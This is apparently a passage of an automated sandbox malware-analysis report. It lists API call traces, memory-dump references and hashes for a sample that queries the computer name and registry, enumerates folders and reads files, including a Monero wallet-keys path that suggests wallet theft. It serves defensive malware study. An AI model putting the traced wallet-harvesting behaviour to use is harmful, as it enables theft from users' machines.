Part of subcall function 008A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 008A792F

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015689C0,?,008B110C,?,00000000,?,008B1110,?,00000000,008B0AEF), ref: 008A6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008A6AE8
CloseHandle.KERNEL32(00000000), ref: 008A6AF9
Sleep.KERNEL32(00001770), ref: 008A6B04
CloseHandle.KERNEL32(?,00000000,?,015689C0,?,008B110C,?,00000000,?,008B1110,?,00000000,008B0AEF), ref: 008A6B1A
ExitProcess.KERNEL32 ref: 008A6B22

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2931873225-0
Opcode ID: b35f9056d77aa955d5c946c0d9169d0dc4daf1d923807c959c0b462bf508b371
Instruction ID: 26dabfb7ecfa2f9796e4d544e61211ca4c187d13853d97b7e04360ac6948a94d
Opcode Fuzzy Hash: b35f9056d77aa955d5c946c0d9169d0dc4daf1d923807c959c0b462bf508b371
Instruction Fuzzy Hash: 0C311C70904108AAEB48F7E8DC56BEE7778FF15300F144529F212E6991EF786905C6A3

Function 008999C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008999EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00899A11
LocalAlloc.KERNEL32(00000040,?), ref: 00899A31
ReadFile.KERNEL32(000000FF,?,00000000,0089148F,00000000), ref: 00899A5A
LocalFree.KERNEL32(0089148F), ref: 00899A90
CloseHandle.KERNEL32(000000FF), ref: 00899A9A

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: d2b6b3ab75ee8b38e3dac8b4f0c653f5556705c5d46c12e7465c283f90acdc60
Instruction ID: f35163e4b26c303b3be62e53214085c28eb36ee8b5843fd52ad898c0ac49bc32
Opcode Fuzzy Hash: d2b6b3ab75ee8b38e3dac8b4f0c653f5556705c5d46c12e7465c283f90acdc60
Instruction Fuzzy Hash: 923116B4A00209EFDF14DF98C885BAE77F5FF48350F108158E902A7290D778AA41CFA1

Function 008A4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0156D9B0), ref: 008A47DB

Part of subcall function 008A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008A8E0B

lstrcat.KERNEL32(?,00000000), ref: 008A4801
lstrcat.KERNEL32(?,?), ref: 008A4820
lstrcat.KERNEL32(?,?), ref: 008A4834
lstrcat.KERNEL32(?,0155B338), ref: 008A4847
lstrcat.KERNEL32(?,?), ref: 008A485B
lstrcat.KERNEL32(?,0156D678), ref: 008A486F

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008A8D90: GetFileAttributesA.KERNEL32(00000000,?,00891B54,?,?,008B564C,?,?,008B0E1F), ref: 008A8D9F

Part of subcall function 008A4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008A4580
Part of subcall function 008A4570: RtlAllocateHeap.NTDLL(00000000), ref: 008A4587
Part of subcall function 008A4570: wsprintfA.USER32 ref: 008A45A6
Part of subcall function 008A4570: FindFirstFileA.KERNEL32(?,?), ref: 008A45BD

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 2a2db82906f945f0381cb697d89538b8b0a8496a6092d2965cd2f08b0f885e2e
Instruction ID: aa74739d4681904c32aca2f8aa4cb2e65bd251750e98527ab24ec4f862b03b69
Opcode Fuzzy Hash: 2a2db82906f945f0381cb697d89538b8b0a8496a6092d2965cd2f08b0f885e2e
Instruction Fuzzy Hash: AD3180B2D00208A7DB14FBF4DC85EEE7378FB58700F444589B71A96091EE749689CBA2

Function 008A40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,0156D458,00000000,00020119,?), ref: 008A40F4
RegQueryValueExA.ADVAPI32(?,0156DAD0,00000000,00000000,00000000,000000FF), ref: 008A4118
RegCloseKey.ADVAPI32(?), ref: 008A4122
lstrcat.KERNEL32(?,00000000), ref: 008A4147
lstrcat.KERNEL32(?,0156D878), ref: 008A415B

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID:
API String ID: 690832082-0
Opcode ID: 55dd373a2baf86f506bcd08ea11744a2b36439b1aa424599936e2541b6e3ab95
Instruction ID: 6f7498fefdce8f85d25733159031fc14bf563e0478e02683a77451dedd5f9cc7
Opcode Fuzzy Hash: 55dd373a2baf86f506bcd08ea11744a2b36439b1aa424599936e2541b6e3ab95
Instruction Fuzzy Hash: 9941D5B6D00108ABDF14FBE4DC4AFEE733DFB98300F444549B61696181EA715B888BA3

Function 6C66C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C66C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C66C969
GetSystemInfo.KERNEL32(?), ref: 6C66C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C66C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C66C9E2

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 806fa9ef3eff5ea6525273a450e0815cbe3cf0fefe36be85dbd594e156b38404
Instruction ID: 8beecf542c0bdd91edfb1ad2115f65f53b1c160ab50849b684cb1bda7047f29d
Opcode Fuzzy Hash: 806fa9ef3eff5ea6525273a450e0815cbe3cf0fefe36be85dbd594e156b38404
Instruction Fuzzy Hash: 5221C531741A147BDB14AE67CCC4BAE72B9AB86744F50061AF903A7E80DB60780087AE

Function 008A7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7E37
RtlAllocateHeap.NTDLL(00000000), ref: 008A7E3E
RegOpenKeyExA.KERNEL32(80000002,0155BAF0,00000000,00020119,?), ref: 008A7E5E
RegQueryValueExA.KERNEL32(?,0156D658,00000000,00000000,000000FF,000000FF), ref: 008A7E7F
RegCloseKey.ADVAPI32(?), ref: 008A7E92

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: d17b213ffc71d4b14ea93e7f9db3aba7f5128364e830ea41465fbf4b6dfbff7d
Instruction ID: 92108839f9e3a2ff24547fd2fcbdd3a38a12310d7a8526375eb07e197633efa0
Opcode Fuzzy Hash: d17b213ffc71d4b14ea93e7f9db3aba7f5128364e830ea41465fbf4b6dfbff7d
Instruction Fuzzy Hash: DE113AB2A44209ABE700DFD4DD49FABBBB8FB44B10F10415AFA16E7680D77459019BA1

Function 008912A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 008912B4
RtlAllocateHeap.NTDLL(00000000), ref: 008912BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 008912D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008912F5
RegCloseKey.ADVAPI32(?), ref: 008912FF

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 053dc5fa6499b74fbfb3b8a62e232a0ce3edb2155c53c498cc03cbbb0d83e7e4
Instruction ID: d3eee7db4887537cacde732e9ce06d832d88ef4be67d9cce4af24dee7545e2d8
Opcode Fuzzy Hash: 053dc5fa6499b74fbfb3b8a62e232a0ce3edb2155c53c498cc03cbbb0d83e7e4
Instruction Fuzzy Hash: 2501CDB9A40208BBDB04DFE4DC49FAEB7B8EB58701F10815AFA06D7280D6759A019B51

Function 0089A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(015689B0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0089A0BD
LoadLibraryA.KERNEL32(0156D4F8), ref: 0089A146

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA820: lstrlen.KERNEL32(00894F05,?,?,00894F05,008B0DDE), ref: 008AA82B
Part of subcall function 008AA820: lstrcpy.KERNEL32(008B0DDE,00000000), ref: 008AA885

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

SetEnvironmentVariableA.KERNEL32(015689B0,00000000,00000000,?,008B12D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,008B0AFE), ref: 0089A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0089A0B2, 0089A0C6, 0089A0DC

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
